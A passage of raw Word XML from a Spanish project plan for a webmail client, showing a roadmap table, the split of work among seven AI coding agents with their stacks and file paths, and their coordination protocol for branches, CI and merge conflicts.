          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tareas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entregable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OAuth2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integración Gmail OAuth2, Microsoft Graph API, autenticación SSO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login con Google/Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Implementar cliente JMAP (RFC 8620/8621) como alternativa a IMAP, auto-detección de soporte JMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soporte dual IMAP/JMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Seguridad avanzada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S/MIME básico, verificación DKIM en headers, audit log, 2FA TOTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capas de seguridad enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Escalabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sharding MongoDB por userId, clustering del API (PM2/Node.js cluster mode), CDN para adjuntos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soporte 10k+ usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentación y release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API docs (OpenAPI/Swagger), guía de administración, guía de contribución, release v1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentación completa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="237"/>
    <w:bookmarkEnd w:id="238"/>
    <w:bookmarkStart w:id="240" w:name="división-de-agentes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.2 División de Agentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El swarm se organiza en 7 agentes especializados, cada uno con responsabilidad sobre un dominio técnico específico. Esta división minimiza conflictos de merge y permite paralelización máxima.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1218"/>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="1066"/>
        <w:gridCol w:w="3198"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Agente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responsabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archivos Principales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UI/UX, componentes Vue 3, estado Pinia, layout tres paneles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vue 3, Vite, Tailwind, Pinia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/web/src/components/**/*.vue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/web/src/stores/*.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/web/src/views/*.vue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Backend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoints REST, schemas Mongoose, auth, validación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fastify 5, Mongoose 8, Zod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/routes/*.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/models/*.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/schemas/*.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">IMAP Bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conexión IMAP, sincronización, parsing MIME, caché</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">imapflow, PostalMime, Redis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/services/imap-bridge.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/services/sync-engine.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/queues/*.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">CalDAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integración CalDAV/CardDAV, parseo .ics, UI calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">tsdav, ical.js, FullCalendar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/services/caldav.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/routes/calendar.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/web/src/views/CalendarView.vue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Schemas, migraciones, índices MongoDB, seeders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mongoose, MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/shared/src/types.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/src/models/*.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/migrations/*.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker, CI/CD, Nginx, monitoreo, secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker, GitHub Actions, Nginx, Prometheus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose*.yml</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/*/Dockerfile</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.github/workflows/*.yml</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nginx/*.conf</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">monitoring/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">QA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests unitarios, integración, E2E, cobertura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vitest, Playwright, Testcontainers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">**/*.spec.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">**/*.test.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/web/e2e/*.spec.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">packages/api/test/**/*.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="239" w:name="protocolo-de-coordinación-entre-agentes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocolo de Coordinación entre Agentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Shared es la fuente de verdad.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El agente Data tiene autoridad exclusiva sobre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/shared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cualquier cambio en tipos o interfaces requiere PR separado que los demás agentes consumen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Contratos API primero.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cuando Frontend y Backend API necesitan un nuevo endpoint, el agente Backend API define el schema Zod de request/response en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/shared/src/schemas/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Frontend consume el tipo inferido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Branches por feature.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cada agente trabaja en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">feature/&lt;agente&gt;-&lt;descripcion&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Los merges a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">requieren CI verde + review del agente líder del dominio afectado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Daily sync automatizado.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un job de CI ejecuta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sobre la rama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cada 6 horas. Si falla, se notifica al agente responsable del último merge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Conflictos de merge:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El agente que creó el archivo tiene prioridad. En archivos compartidos (ej:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/shared/src/types.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), gana el agente Data.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="239"/>
    <w:bookmarkEnd w:id="240"/>
    <w:bookmarkStart w:id="251" w:name="reglas-de-oro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3 Reglas de Oro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estas reglas son no negociables. Todo código mergeado a</w:t>
      </w:r>
      <w:r>
